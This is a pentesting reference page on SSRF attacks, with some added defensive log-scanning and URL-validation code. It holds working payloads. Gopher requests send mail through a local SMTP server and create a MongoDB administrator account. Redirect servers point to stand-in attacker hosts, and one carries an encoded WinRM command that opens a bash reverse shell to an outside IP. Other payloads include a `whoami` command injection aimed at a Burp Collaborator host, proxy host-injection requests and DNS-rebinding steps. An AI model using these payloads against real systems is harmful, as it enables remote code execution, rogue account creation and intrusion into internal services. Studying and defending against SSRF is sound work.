# SSRF (Server Side Request Forgery)
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
## Basic Information

A Server-Side Request Forgery (SSRF) vulnerability occurs when an attacker manipulates a server-side application into making HTTP requests to a domain of their choice. This vulnerability exposes the server to arbitrary external requests directed by the attacker.
## Capture SSRF

The first thing you need to do is capture an SSRF interaction triggered by you. To capture an HTTP or DNS interaction you can use tools such as:
- Burp Collaborator
- pingb
- canarytokens
- interactsh
- http://webhook.site
- https://github.com/teknogeek/ssrf-sheriff
- http://requestrepo.com/
- https://github.com/stolenusername/cowitness
- https://github.com/dwisiswant0/ngocok - A Burp Collaborator using ngrok
## Whitelisted Domain Bypass

Usually you will find that the SSRF only works in certain whitelisted domains or URLs. The following page has a compilation of techniques to try to bypass that whitelist:
{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}
### Bypass via open redirect

If the server is correctly protected you could bypass all the restrictions by exploiting an Open Redirect inside the web page. Because the web page will allow SSRF to the same domain and will probably follow redirects, you can exploit the Open Redirect to make the server access any internal resource.

Read more here: https://portswigger.net/web-security/ssrf
## Protocols

- **file://**
  - The URL scheme `file://` is referenced, pointing directly to `/etc/passwd`: `file:///etc/passwd`
- **dict://**
  - The DICT URL scheme is described as being used for accessing definitions or word lists via the DICT protocol. The example given shows a constructed URL targeting a specific word, database, and entry number, as well as an instance of a PHP script being potentially misused to connect to a DICT server using attacker-provided credentials: `dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>`
- **SFTP://**
  - Identified as a protocol for secure file transfer over secure shell, an example is provided showing how a PHP script could be exploited to connect to a malicious SFTP server: `url=sftp://generic.com:11111/`
- **TFTP://**
  - Trivial File Transfer Protocol, operating over UDP, is mentioned with an example of a PHP script designed to send a request to a TFTP server. A TFTP request is made to 'generic.com' on port '12346' for the file 'TESTUDPPACKET': `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
- **LDAP://**
  - This segment covers the Lightweight Directory Access Protocol, emphasizing its use for managing and accessing distributed directory information services over IP networks. Interact with an LDAP server on localhost: `'%0astats%0aquit'` via `ssrf.php?url=ldap://localhost:11211/%0astats%0aquit`.
- **SMTP**
  - A method is described for exploiting SSRF vulnerabilities to interact with SMTP services on localhost, including steps to reveal internal domain names and further investigative actions based on that information.

From https://twitter.com/har1sec/status/1182255952055164929:

1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220 [http://blabla.internaldomain.com](https://t.co/Ad49NBb7xy) ESMTP Sendmail
3. search [http://internaldomain.com](https://t.co/K0mHR0SPVH) on github, find subdomains
4. connect
- **Curl URL globbing - WAF bypass**
  - If the SSRF is executed by **curl**, curl has a feature called URL globbing that could be useful to bypass WAFs. For example in this writeup you can find this example of **path traversal via the `file` protocol**: `file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}`
- **Gopher://**
  - The Gopher protocol's ability to specify IP, port, and bytes for server communication is discussed, along with tools like Gopherus and remote-method-guesser for crafting payloads. Two different usages are illustrated:

### Gopher://

Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit an SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).

Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.
**Gopher smtp**

```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
```

will make a request like

```
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AH

You didn't say the magic word !


.
QUIT
```
**Gopher HTTP**

```bash
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```
**Gopher SMTP - Back connect to 1337**

{% code title="redirect.php" %}
```php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
```
{% endcode %}

Now query it:

```
https://example.com/?q=http://evil.com/redirect.php
```
**Gopher MongoDB - Create a user with username=admin, password=admin123 and permission=administrator**

```bash
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%07%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00%00%00administrator%00%00%00%00'
```
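As an added defensive example (not part of the HackTricks page), the following Python scans constructed web-server access-log lines for fetch parameters that use the handlers and encodings listed above: a non-http(s) scheme, double percent-encoding such as `%250d%250a`, and decoded CR/LF that would let a fetcher smuggle a second protocol. The log lines, the `/fetch?url=` parameter name and the allowed-scheme set are assumptions for the demo.

```python
import re
from urllib.parse import unquote, urlsplit

# Schemes an outbound-fetch feature should accept; anything else is flagged.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Sep/2017:17:20:26 -0400] "GET /fetch?url=https://example.org/feed HTTP/1.1" 200 512
10.0.0.9 - - [15/Sep/2017:17:21:01 -0400] "GET /fetch?url=file:///etc/passwd HTTP/1.1" 200 1024
10.0.0.9 - - [15/Sep/2017:17:21:07 -0400] "GET /fetch?url=gopher://127.0.0.1:25/_HELO%20localhost%250d%250aQUIT HTTP/1.1" 200 0
10.0.0.9 - - [15/Sep/2017:17:21:15 -0400] "GET /fetch?url=dict://localhost:11211/stats HTTP/1.1" 200 0
10.0.0.9 - - [15/Sep/2017:17:21:22 -0400] "GET /fetch?url=http://example.org/%250d%250aX HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')


def full_decode(value, max_rounds=3):
    """Percent-decode repeatedly, returning (text, rounds). Two rounds mean the
    value was double-encoded, e.g. %250d -> %0d -> CR, which is how the gopher
    payloads above smuggle line breaks past a fetcher that decodes once."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def raw_query_params(query):
    """Split a query string without decoding, so the encoding depth is preserved."""
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            yield key, value


def analyse_fetch_url(raw_url):
    """Findings for one user-supplied URL value; an empty list means nothing flagged."""
    findings = []
    decoded, rounds = full_decode(raw_url)
    scheme = urlsplit(decoded).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        findings.append(f"scheme:{scheme}")      # file, dict, gopher, tftp, ldap, sftp ...
    if rounds > 1:
        findings.append("double-encoding")
    if "\r" in decoded or "\n" in decoded:
        findings.append("crlf")                  # protocol smuggling (SMTP, Redis, HTTP ...)
    return findings


def scan_log(text, param="url"):
    """Return (client_ip, raw_url, findings) for every flagged fetch parameter."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for key, value in raw_query_params(query):
            if key != param:
                continue
            findings = analyse_fetch_url(value)
            if findings:
                hits.append((line.split()[0], value, findings))
    return hits


if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, url)
```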
## SSRF via Referrer header & Others

Analytics software on servers often logs the Referrer header to track incoming links, a practice that inadvertently exposes applications to Server-Side Request Forgery (SSRF) vulnerabilities. This is because such software may visit external URLs mentioned in the Referrer header to analyze referring site content. To uncover these vulnerabilities, the Burp Suite plugin "Collaborator Everywhere" is advised, leveraging the way analytics tools process the Referer header to identify potential SSRF attack surfaces.
## SSRF via SNI data from certificate

A misconfiguration that could enable the connection to any backend through a simple setup is illustrated with an example Nginx configuration:

```nginx
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
```

In this configuration, the value from the Server Name Indication (SNI) field is directly used as the backend's address. This setup exposes a Server-Side Request Forgery (SSRF) vulnerability, which can be exploited by merely specifying the desired IP address or domain name in the SNI field. An example of exploitation to force a connection to an arbitrary backend, such as `internal.host.com`, using the `openssl` command is given below:

```bash
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
```
## Wget file upload

## SSRF with Command Injection

It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``

## PDFs Rendering

If the web page is automatically creating a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF and you will be able to abuse an SSRF. Find more information here.
## From SSRF to DoS

Create several sessions and try to download heavy files exploiting the SSRF from the sessions.

## SSRF PHP Functions

Check the following page for vulnerable PHP and even Wordpress functions:

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

## SSRF Redirect to Gopher

For some exploitations you might need to send a redirect response (potentially to use a different protocol like gopher). Here you have different python codes to respond with a redirect:
```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl


class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        self.send_response(301)
        # Adjacent string literals are joined by Python; the gopher URL is one value
        self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%"
                         "20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c"
                         "%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
        self.end_headers()


httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="server.pem")
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```
```python
from flask import Flask, redirect
from urllib.parse import quote

app = Flask(__name__)


@app.route('/')
def root():
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)


if __name__ == "__main__":
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
## Misconfigured proxies to SSRF

Trick from this post.
### Flask

**Flask proxy vulnerable code**

```python
from flask import Flask
from requests import get

app = Flask('main')
SITE_NAME = 'https://google.com'


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    # The upstream URL is built by string concatenation: a path that starts with
    # '@' turns SITE_NAME's host into userinfo and the attacker's host is contacted
    return get(f'{SITE_NAME}{path}').content


if __name__ == "__main__":
    app.run(threaded=False)
```
Flask allows using **`@`** as the initial character, which allows making the **initial hostname the username** and injecting a new one. Attack request:

```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close
```
### Spring Boot

Vulnerable code:

It was discovered that it's possible to start the path of the request with the character `;`, which then allows using `@` and injecting a new host to access. Attack request:

```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
### PHP Built-in Web Server

**PHP vulnerable code**

```php
<?php
// Assumed setup (not shown on the page): a fixed upstream site plus the client's request path
$site = 'https://example.com';
$current_uri = $_SERVER['REQUEST_URI'];

$proxy_site = $site.$current_uri;
var_dump($proxy_site);
echo "\n\n";
$response = file_get_contents($proxy_site);
var_dump($response);
?>
```

PHP allows the use of the **character `*` before a slash in the path** of the URL; however, it has other limitations, such as that it can only be used for the root path `/` and that dots `.` aren't allowed before the first slash, so it's necessary to use a hex-encoded IP address without dots, for example:

```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close
```
## DNS Rebinding CORS/SOP bypass

If you are having **problems exfiltrating content from a local IP** because of **CORS/SOP**, **DNS Rebinding** can be used to bypass that limitation:

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}
### Automated DNS Rebinding

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server's DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.

Check out also the publicly running server at http://rebind.it/singularity.html
### DNS Rebinding + TLS Session ID/Session ticket

Requirements:

- SSRF
- Outbound TLS sessions
- Stuff on local ports

Attack:

- Ask the user/bot to access a domain controlled by the attacker
- The TTL of the DNS is 0 sec (so the victim will check the IP of the domain again soon)
- A TLS connection is created between the victim and the attacker's domain. The attacker introduces the payload inside the Session ID or Session Ticket.
- The domain will start an infinite loop of redirects against itself. The goal of this is to make the user/bot access the domain until it performs a DNS request for the domain again.
- In the DNS request a private IP address is now given (127.0.0.1 for example)
- The user/bot will try to re-establish the TLS connection and in order to do so it will send the Session ID/Ticket ID (where the attacker's payload was contained). So congratulations, you managed to ask the user/bot to attack itself.

Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).

To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/

For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
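As an added example (not code from the page or from the projects it cites), this Python shows the host confusion behind the Flask/Spring/PHP proxies above (`naive_proxy_target`) and a fetch validator, `pin_target`, that rejects non-http(s) schemes, userinfo tricks and private/loopback/link-local targets, then resolves the host once and pins the IP so a rebinding answer that arrives later cannot redirect the request; it applies equally to the Referer-following analytics fetchers described earlier. The resolver is injectable and `FAKE_DNS` is a constructed table so the demo runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}


class UnsafeURL(ValueError):
    """Raised when a user-supplied URL must not be fetched server-side."""


def naive_proxy_target(site_name, path):
    """Host really contacted by the proxies above, which concatenate a fixed site
    with the request path: a path starting with '@' demotes the site to userinfo."""
    return urlsplit(site_name + path).hostname


def ip_is_public(ip):
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local
                or a.is_multicast or a.is_reserved or a.is_unspecified)


def system_resolver(host):
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def pin_target(user_url, resolver=system_resolver, allowed_hosts=None):
    """Validate the URL, resolve its host exactly once and return the pinned target.
    The caller connects to connect_url, sends the original host in the Host header
    (and uses it for SNI/certificate checks on https), and never follows redirects
    automatically: every redirect hop goes through pin_target again."""
    parts = urlsplit(user_url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {scheme!r} not allowed")
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo ('@') not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    if allowed_hosts is not None and host not in allowed_hosts:
        raise UnsafeURL(f"host {host!r} not in allowlist")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError as exc:
        raise UnsafeURL("invalid port") from exc
    try:
        ips = [str(ipaddress.ip_address(host))]   # IP literal: nothing to resolve
    except ValueError:
        ips = resolver(host)
    if not ips:
        raise UnsafeURL(f"{host!r} does not resolve")
    bad = [ip for ip in ips if not ip_is_public(ip)]
    if bad:
        raise UnsafeURL(f"{host!r} resolves to non-public address(es) {bad}")
    pinned = ips[0]
    literal = f"[{pinned}]" if ":" in pinned else pinned
    connect_url = urlunsplit((scheme, f"{literal}:{port}", parts.path or "/", parts.query, ""))
    return {"host": host, "ip": pinned, "port": port, "connect_url": connect_url}


# Constructed DNS answers for the offline demo (not real records); the second name
# stands in for a rebinding domain whose answer has flipped to loopback.
FAKE_DNS = {"example.org": ["93.184.216.34"], "rebind.example.org": ["127.0.0.1"]}


def fake_resolver(host):
    return FAKE_DNS.get(host, [])
```

Calling `pin_target("http://rebind.example.org/", fake_resolver)` raises `UnsafeURL`, while `pin_target("http://example.org/page?x=1", fake_resolver)` returns a `connect_url` on the pinned IP; with `requests`, send `headers={"Host": host}` and `allow_redirects=False`, and note that https against an IP URL needs a custom adapter to keep verifying the certificate against `host`.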
## Blind SSRF

The difference between a blind SSRF and a non-blind one is that in the blind one you cannot see the response of the SSRF request. It is therefore more difficult to exploit, because you will only be able to exploit well-known vulnerabilities.

### Time based SSRF

By checking the response times from the server it might be possible to know whether a resource exists or not (accessing an existing resource may take more time than accessing one that doesn't exist).
## Cloud SSRF Exploitation

If you find an SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}
## SSRF Vulnerable Platforms

Several known platforms contain or have contained SSRF vulnerabilities, check them in:

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}
## Tools

### SSRFMap

Tool to detect and exploit SSRF vulnerabilities

### Gopherus

This tool generates Gopher payloads for:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- Zabbix
- Memcache
### remote-method-guesser

remote-method-guesser is a Java RMI vulnerability scanner that supports attack operations for most common Java RMI vulnerabilities. Most of the available operations support the `--ssrf` option, to generate an SSRF payload for the requested operation. Together with the `--gopher` option, ready-to-use gopher payloads can be generated directly.
### SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
## To practice
{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
## References
- https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/
- https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies